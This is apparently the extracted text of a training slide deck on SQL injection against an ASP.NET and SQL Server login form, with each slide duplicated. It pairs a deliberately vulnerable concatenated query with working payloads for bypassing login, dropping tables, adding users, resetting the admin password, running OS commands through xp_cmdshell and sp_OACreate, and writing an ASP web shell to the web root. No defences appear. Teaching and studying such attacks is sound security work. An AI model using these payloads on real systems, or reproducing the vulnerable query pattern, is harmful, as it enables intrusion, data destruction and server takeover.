Security.NETSecurity.NET

Chapter 2Chapter 2

SQL InjectionSQL Injection

• A form of a script injection attack

• Malicious user input is used to affect SQL script that is executed

• A form of a script injection attack

• Malicious user input is used to affect SQL script that is executed

Example TableExample Table

CREATE TABLE [dbo].[users] (

[id] [int] NOT NULL ,

[uname] [varchar] (255) COLLATE Hebrew_CI_AS NULL ,

[pass] [varchar] (255) COLLATE Hebrew_CI_AS NULL ,

[priv] [int] NULL

) ON [PRIMARY]

CREATE TABLE [dbo].[users] (

[id] [int] NOT NULL ,

[uname] [varchar] (255) COLLATE Hebrew_CI_AS NULL ,

[pass] [varchar] (255) COLLATE Hebrew_CI_AS NULL ,

[priv] [int] NULL

) ON [PRIMARY]

Example codeExample code

sqlConnection1.Open();sqlCommand1.CommandText="select * from users where

uname='" + TextBox1.Text + "' and pass='" + TextBox2.Text + "'";

SqlDataReader d=sqlCommand1.ExecuteReader();if(d.HasRows == true)

Response.Redirect("ok.aspx");else

Response.Redirect("error.aspx");d.Close();sqlConnection1.Close();

sqlConnection1.Open();sqlCommand1.CommandText="select * from users where

uname='" + TextBox1.Text + "' and pass='" + TextBox2.Text + "'";

SqlDataReader d=sqlCommand1.ExecuteReader();if(d.HasRows == true)

Response.Redirect("ok.aspx");else

Response.Redirect("error.aspx");d.Close();sqlConnection1.Close();

Bypass the checkBypass the check

• In the user textbox type:

' or 1=1 –

You can also drop table by

'; drop table t1; --

• In the user textbox type:

' or 1=1 –

You can also drop table by

'; drop table t1; --

Find the table structure Find the table structure

• ' having 1=1—

• You get error:

Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause

• Table name: users

• Column: id

• ' having 1=1—

• You get error:

Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause

• Table name: users

• Column: id

Table structureTable structure

• ' group by users.id having 1=1--

• ' group by users.id, users.uname having 1=1--

• ' group by users.id, users.uname, users.pass having 1=1--

• ' group by users.id, users.uname, users.pass, users.priv having 1=1--

• ' group by users.id having 1=1--

• ' group by users.id, users.uname having 1=1--

• ' group by users.id, users.uname, users.pass having 1=1--

• ' group by users.id, users.uname, users.pass, users.priv having 1=1--

Data typesData types

• ' union select sum(id) from users--

• ' union select sum(uname) from users--

• ' union select sum(pass) from users--

• ' union select sum(priv) from users--

• ' union select sum(id) from users--

• ' union select sum(uname) from users--

• ' union select sum(pass) from users--

• ' union select sum(priv) from users--

Create a new userCreate a new user

• '; insert users values(5,'hacker','pass',1); --

• You can also update the administrator password for example:

'; update users set pass='12345' where uname='admin'; --

• '; insert users values(5,'hacker','pass',1); --

• You can also update the administrator password for example:

'; update users set pass='12345' where uname='admin'; --

Error messagesError messages

• Too much information

• All system messages:

select * from master..sysmessages

• Too much information

• All system messages:

select * from master..sysmessages

Extended S.P.Extended S.P.

• ' exec master..xp_cmdshell 'calc' –

• Use for D.O.S. Attack

• Find the windows users:

' exec master..xp_cmdshell 'net1 user > C:\Inetpub\wwwroot\sqlinj\u.txt' –

• ' exec master..xp_cmdshell 'calc' –

• Use for D.O.S. Attack

• Find the windows users:

' exec master..xp_cmdshell 'net1 user > C:\Inetpub\wwwroot\sqlinj\u.txt' –

Registry XPRegistry XP

• xp_regaddmultistring • xp_regdeletekey • xp_regdeletevalue • xp_regenumkeys • xp_regenumvalues • xp_regread • xp_regremovemultistring • xp_regwrite • Example:

– exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'

• xp_regaddmultistring • xp_regdeletekey • xp_regdeletevalue • xp_regenumkeys • xp_regenumvalues • xp_regread • xp_regremovemultistring • xp_regwrite • Example:

– exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'

Other XPOther XP

• exec master..xp_servicecontrol 'start', 'schedule' • xp_availablemedia - reveals the available drives

on the machine.• xp_dirtree - allows a directory tree to be

obtained• xp_enumdsn - enumerates ODBC data sources

on the server• xp_loginconfig - reveals information about the

security mode of the server.• xp_terminate_process - terminates a process,

given its PID

• exec master..xp_servicecontrol 'start', 'schedule' • xp_availablemedia - reveals the available drives

on the machine.• xp_dirtree - allows a directory tree to be

obtained• xp_enumdsn - enumerates ODBC data sources

on the server• xp_loginconfig - reveals information about the

security mode of the server.• xp_terminate_process - terminates a process,

given its PID

COM ComponentsCOM Components

• Tsql script:declare @o int

exec sp_OACreate 'wscript.shell', @o out

exec sp_OAMethod @o, 'run', NULL, 'notepad.exe‘

Browser:'; declare @o int exec sp_OACreate 'wscript.shell', @o out

exec sp_OAMethod @o, 'run', NULL, 'notepad.exe'--

• Tsql script:declare @o int

exec sp_OACreate 'wscript.shell', @o out

exec sp_OAMethod @o, 'run', NULL, 'notepad.exe‘

Browser:'; declare @o int exec sp_OACreate 'wscript.shell', @o out

exec sp_OAMethod @o, 'run', NULL, 'notepad.exe'--

Dynamic ASPDynamic ASP

declare @o int, @f int, @t int, @ret int exec sp_OACreate 'scripting.filesystemobject', @o out exec sp_OAMethod @o, 'createtextfile', @f out, 'c:\inetpub\

wwwroot\foo.asp', 1 exec @ret = sp_OAMethod @f, 'writeline', NULL,

'<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'

declare @o int, @f int, @t int, @ret int exec sp_OACreate 'scripting.filesystemobject', @o out exec sp_OAMethod @o, 'createtextfile', @f out, 'c:\inetpub\

wwwroot\foo.asp', 1 exec @ret = sp_OAMethod @f, 'writeline', NULL,

'<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'